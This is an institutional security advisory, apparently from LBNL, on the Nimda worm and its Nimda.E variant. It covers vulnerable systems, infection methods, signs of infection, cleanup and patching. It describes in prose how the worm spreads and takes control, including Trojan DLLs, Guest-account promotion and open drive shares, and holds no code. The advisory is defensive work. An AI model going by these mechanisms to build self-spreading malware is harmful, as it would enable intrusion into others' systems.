• Nimda Worm Protection ABCs

• Which Systems and Applications Are Vulnerable?
• How Nimda Infects a System (in a Nutshell)
• Detecting an Infection
• Cleaning Up After an Infection
• Preventing Nimda Infections

• The Nimda.E Variant

<< Back to Alerts Home

_____________

Nimda Worm Protection ABCs

Which Systems and Applications Are Vulnerable?

With Netscape e-mail, you will not become infected unless you take the additional step of opening the attachment. Do not open attachments ending in an .exe suffix.

The Netscape browser is not vulnerable to infected Web sites.

Browsers or E-mail clients running on Mac or Unix are NOT susceptible to NIMDA.

How Nimda Infects Systems (in a Nutshell)

Nimda uses a variety of methods to infect victim systems-something that makes it more troublesome than most other worms and viruses. Infection methods include:

• Sending a malformed MIME header in Microsoft Outlook and Outlook Express to the mail reader, causing the e-mail attachment to be automatically run (thus infecting the system), then sending itself to Address Book addresses,

• Nimda then copies itself to a file named readme.eml in every accessible directory within an infected system. If a directory has HTML or ASP files, Nimda writes a JavaScript routine that tries to load the Nimda code on the client system when any user reads an infected page. It also copies a malicious file, readme.eml, to every shared directory, such that if a user selects that file while Web View in Windows Explorer is enabled, the HTML activates, resulting in infection of the system. As if this is not enough, it creates Trojan version of riched20.dll in any directory that contains .doc files and causes this dll (dynamic link library) to be executed during system startup. Additionally, it tries to infect the riched20.dll file in the System32 directory as well as any exe files it locates on remote systems. It attempts to infect both the same way a normal virus would, such that the worm code is loaded prior to the regular executable code.

Once the worm has infected a system, it:

• Enables the Guest account and adds it to the Administrators group,
• Shares the C: drive, giving Full Control to Everyone,
• Disables share-level permissions on every shared directory,
• Modifies other Registry keys and system files.

For more detail concerning Nimda's infection mechanisms, visit Information on the Nimda Worm (Microsoft TechNet)

A Nimda infection results in changes to systems, so be on the lookout for:

• The existence of a root.exe file (which shows that the Code Red II or sadmind/IIS worms have infected the system, making it vulnerable to Nimda).
  
  
• The presence of Admin.dll in the root directory of the c, d, and/or e drives (although the Internet Information Server, IIS, can legitimately install this file in directories, so be careful here).
  
  
• The presence of.eml or .nws files in various directories.

LBNL's intrusion detection tool, BRO, has been discovering Nimda infections in LBNL systems. If your system has been infected and BRO has detected the infection, your system's network access will be temporarily blocked until it is clean of the infection. If you notice that you can reach LBNL addresses but not others, contact the Help Desk by dialing HELP or sending email to help@lbl.gov.

Cleaning up a Nimda Infection

Nimda is deadly. It not only can gain full control over a victim system, but it also modifies files as well as adding Trojan files to directories. The best remedy for a Nimda infection, therefore, is to reformat the hard drive of the infected system, then reinstall every software program from trusted copies. Reformatting the hard drive is a drastic measure, true, but one can never be sure of the integrity of any system that has been infected by Nimda until the system is rebuilt.

CAUTION: Do not reformat the hard drive if you have never rebuilt a system before! You may not only wipe out your system, but may lose all data. Leave your system on, attach a DO NOT USE sign on your display terminal, call the Help Desk, and wait!

Do not try to recover HTML or ASP documents from any system that Nimda has infected without first deleting all Nimda propagation code and the readme.eml file. Delete all Trojan versions of riched20.dll from all document directories. Avoid copying any executables from an infected system to a clean one.

A second but far less desirable solution is to download, then run Symantec's W32.Nimda.A@mm Removal Tool.

If you run Symantec's tool, you will also have to take additional actions, such as changing all passwords of all accounts with Administrator privileges, disabling the Guest account, removing the Guest account from the Administrators Group, and others, depending on what Nimda has done. Note also that Symantec's tool does not help prevent infections—it only helps in cleaning up infected systems.

Preventing Nimda Infections

The best countermeasure against Nimda is to prevent infections in the first place. This last and final part of this posting explains how to do this.

Installing SPs and Hotfixes

The best way to prevent Nimda infections is to ensure that you have installed the latest patches on your system. If you are running Windows NT, you should install not only SP6a, but also the post-SP6a hot fixes. Download from http://www.lbl.gov/download/. The same URL can be used to download SP2 for Windows 2000 as well as the post-SP2 hotfixes.

The LBNL Computer Protection Program also strongly recommends that you download and run a tool, hfnetchk, to check whether critical hotfixes have been installed. You can get hfnetchk at Microsoft TechNet/HFNETCHK.

Defending Internet Explorer (IE)

If your system runs Microsoft's Internet Explorer (IE), verify that the patch described in Microsoft Bulletin MS01-020 is installed.

Verify also that the IE patch provided in Microsoft Security Bulletin MS01-027 is installed.

Next you need to learn what version of IE your system is running. Go to your system's Windows Explorer search function, then search for "Explorer." Look for a file named "iexplore." Move the pointer to "iexplore," then right click to Properties, then click on the Version tab at the top. The first two sets of numbers that will appear to the right of the Version field in the dialog box that will appear are the version of IE.

• Internet Explorer 5.01 Service Pack 2
• Internet Explorer 5.5 Service Pack 2
• Internet Explorer 6 (if you are installing IE 6 as an upgrade on a Windows 95, 98, 98SE or ME system, select Full Install as the installation type)

Securing the Internet Information Server (IIS) (this applies only to Windows NT and Windows 2000 systems):

To protect against Nimba infections, you will also need to secure IIS. To check whether your system is running IIS, go from Start to Run, then enter "cmd." Now enter "net start | more" If the IIS Admin Service is listed, IIS is running. If you do not need IIS, you should disable it immediately. (See IIS Server Guidelines for instructions concerning how to do this.)

You may also want to run Microsoft's IIS Lockdown Tool in its default mode. Click here to download.

Top

The Nimda.E Variant

New variants of malicious, self-reproductive programs continue to surface. One of the latest is a new version of Nimda called "Nimda.E." Spreading both via email and the web, it attempts to exploit the same vulnerabilities that the original version of Nimda targeted, particularly IIS cross-site scripting vulnerabilities (described in Microsoft Bulletin MS00-60), the IIS web server folder traversal vulnerability (described in Microsoft Bulletin MS00-078), and also a vulnerability in which an incorrect MIME header can cause IE to execute an e-mail attachment (described in Microsoft Bulletin MS01-020).

If Nimda.E comes in the form of a email attachment, it is usually named "sample.eml" or "sample.exe." Once Nimba.E executes it inserts the Trojan riched20.dll into the victim system, just as the original version of Nimda does. In contrast, however, Nimda.E also attempts to download two additional dlls, httpodbc.dll, and cool.dll. The httpodbc.dll is named identically to a legitimate dll in IIS systems, but it is inserted in a different path from the one for the legitimate version of this dll. The different path renders Windows 2000's Windows File Protection ineffective in detecting any violation of system integrity. Additionally, the name "cool.dll" can be confusing because it is the name of a legitimate dll in Windows 98 systems.

Ensuring that all Service Packs and hot fixes have been installed is the best way to defend your system against Nimda, Nimda.E, and other types of malicious programs that target Windows operating systems, browsers, mail clients, and IIS servers. The latest Service Packs and hot fixes (included bundled hot fixes, which can save you a considerable amount of time, effort, and frustration), are available at http://www.lbl.gov/download/.

It is critical to check that you have updated your IE Browser to ensure you're not running one that's vulnerable to MS01-020. You should be running IE 5.01 SP2, IE 5.5 SP2, or IE 6.0 to be sure you're not vulnerable, or apply the MS01-027 patch (which supercedes MS01-020).

Prevention is the best cure for Nimda.E, but if your system is successfully attacked by this virus/worm, be sure to follow the procedures described in Clearning Up a Nimda Infection (above).